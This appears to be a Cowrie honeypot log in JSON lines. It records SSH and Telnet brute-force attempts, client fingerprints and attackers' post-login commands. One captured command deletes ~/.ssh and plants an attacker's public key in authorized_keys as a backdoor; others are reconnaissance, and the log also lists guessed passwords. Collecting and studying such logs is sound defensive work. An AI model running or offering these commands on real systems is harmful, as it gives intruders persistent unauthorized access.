{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:02.183028Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:13:02.616816Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-09T04:13:02.617608Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:02.789714Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:13:03.186298Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-09T04:13:03.187201Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:03.358852Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:13:03.716544Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-09T04:13:03.717256Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:03.889360Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.closed","duration":"20.3","message":"Connection lost after 20.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:03.890695Z","src_ip":"102.68.86.62","session":"2eefa37e486a"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":49414,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe65fc2503dc","protocol":"ssh","message":"New connection: 92.118.39.62:49414 (1.2.3.4:22) [session: fe65fc2503dc]","sensor":"my-vps","timestamp":"2025-09-09T04:13:03.921450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:13:03.922080Z","src_ip":"92.118.39.62","session":"fe65fc2503dc"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T04:13:03.952087Z","src_ip":"92.118.39.62","session":"fe65fc2503dc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12","message":"login attempt [admin/12] failed","sensor":"my-vps","timestamp":"2025-09-09T04:13:04.044712Z","src_ip":"92.118.39.62","session":"fe65fc2503dc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:05.076766Z","src_ip":"92.118.39.62","session":"fe65fc2503dc"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":41044,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9bb94ff895a","protocol":"ssh","message":"New connection: 51.81.118.153:41044 (1.2.3.4:22) [session: e9bb94ff895a]","sensor":"my-vps","timestamp":"2025-09-09T04:13:12.962412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:13:12.963225Z","src_ip":"51.81.118.153","session":"e9bb94ff895a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:13:13.061412Z","src_ip":"51.81.118.153","session":"e9bb94ff895a"}
{"eventid":"cowrie.login.failed","username":"local","password":"local123","message":"login attempt [local/local123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:13:13.492114Z","src_ip":"51.81.118.153","session":"e9bb94ff895a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:14.592495Z","src_ip":"51.81.118.153","session":"e9bb94ff895a"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":35644,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f3faf59964a","protocol":"ssh","message":"New connection: 152.32.190.168:35644 (1.2.3.4:22) [session: 6f3faf59964a]","sensor":"my-vps","timestamp":"2025-09-09T04:13:20.592736Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:13:20.593399Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:13:20.795645Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.login.success","username":"root","password":"bloemetje","message":"login attempt [root/bloemetje] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:13:21.644776Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:13:22.100443Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:13:22.101113Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:13:22.102198Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:22.305091Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:13:22.766181Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:13:22.766955Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:13:22.971056Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:22.971988Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":35650,"dst_ip":"1.2.3.4","dst_port":22,"session":"02d7ef12eab9","protocol":"ssh","message":"New connection: 152.32.190.168:35650 (1.2.3.4:22) [session: 02d7ef12eab9]","sensor":"my-vps","timestamp":"2025-09-09T04:13:23.285421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:13:23.286263Z","src_ip":"152.32.190.168","session":"02d7ef12eab9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:13:23.546199Z","src_ip":"152.32.190.168","session":"02d7ef12eab9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:13:24.625783Z","src_ip":"152.32.190.168","session":"02d7ef12eab9"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:25.888566Z","src_ip":"152.32.190.168","session":"02d7ef12eab9"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":35652,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc444cf13811","protocol":"ssh","message":"New connection: 152.32.190.168:35652 (1.2.3.4:22) [session: bc444cf13811]","sensor":"my-vps","timestamp":"2025-09-09T04:13:26.025165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:13:26.025827Z","src_ip":"152.32.190.168","session":"bc444cf13811"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:13:26.220951Z","src_ip":"152.32.190.168","session":"bc444cf13811"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:13:27.042137Z","src_ip":"152.32.190.168","session":"bc444cf13811"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:27.238953Z","src_ip":"152.32.190.168","session":"bc444cf13811"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:27.241620Z","src_ip":"152.32.190.168","session":"6f3faf59964a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45178,"dst_ip":"1.2.3.4","dst_port":23,"session":"790893de5b2b","protocol":"telnet","message":"New connection: 212.227.125.160:45178 (1.2.3.4:23) [session: 790893de5b2b]","sensor":"my-vps","timestamp":"2025-09-09T04:13:36.367082Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45180,"dst_ip":"1.2.3.4","dst_port":23,"session":"250e539d4523","protocol":"telnet","message":"New connection: 212.227.125.160:45180 (1.2.3.4:23) [session: 250e539d4523]","sensor":"my-vps","timestamp":"2025-09-09T04:13:37.005380Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45206,"dst_ip":"1.2.3.4","dst_port":23,"session":"1c8b7cd6b040","protocol":"telnet","message":"New connection: 212.227.125.160:45206 (1.2.3.4:23) [session: 1c8b7cd6b040]","sensor":"my-vps","timestamp":"2025-09-09T04:13:39.332452Z"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":44804,"dst_ip":"1.2.3.4","dst_port":22,"session":"59e55e02a5b7","protocol":"ssh","message":"New connection: 211.22.25.164:44804 (1.2.3.4:22) [session: 59e55e02a5b7]","sensor":"my-vps","timestamp":"2025-09-09T04:13:40.589673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:13:40.591556Z","src_ip":"211.22.25.164","session":"59e55e02a5b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:13:40.831650Z","src_ip":"211.22.25.164","session":"59e55e02a5b7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50196,"dst_ip":"1.2.3.4","dst_port":22,"session":"286b422340b8","protocol":"ssh","message":"New connection: 217.72.205.35:50196 (1.2.3.4:22) [session: 286b422340b8]","sensor":"my-vps","timestamp":"2025-09-09T04:13:41.683152Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:41.684240Z","src_ip":"217.72.205.35","session":"286b422340b8"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"Welcome1","message":"login attempt [uftp/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:13:41.833923Z","src_ip":"211.22.25.164","session":"59e55e02a5b7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:43.076855Z","src_ip":"211.22.25.164","session":"59e55e02a5b7"}
{"eventid":"cowrie.session.closed","duration":13.8791983127594,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:50.246180Z","src_ip":"212.227.125.160","session":"790893de5b2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45392,"dst_ip":"1.2.3.4","dst_port":23,"session":"6370f48ec09b","protocol":"telnet","message":"New connection: 212.227.125.160:45392 (1.2.3.4:23) [session: 6370f48ec09b]","sensor":"my-vps","timestamp":"2025-09-09T04:13:50.481565Z"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":46196,"dst_ip":"1.2.3.4","dst_port":22,"session":"c45b33a5327e","protocol":"ssh","message":"New connection: 154.209.4.55:46196 (1.2.3.4:22) [session: c45b33a5327e]","sensor":"my-vps","timestamp":"2025-09-09T04:13:50.977588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:13:50.979178Z","src_ip":"154.209.4.55","session":"c45b33a5327e"}
{"eventid":"cowrie.session.closed","duration":14.027462005615234,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:13:51.032778Z","src_ip":"212.227.125.160","session":"250e539d4523"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:13:51.184934Z","src_ip":"154.209.4.55","session":"c45b33a5327e"}
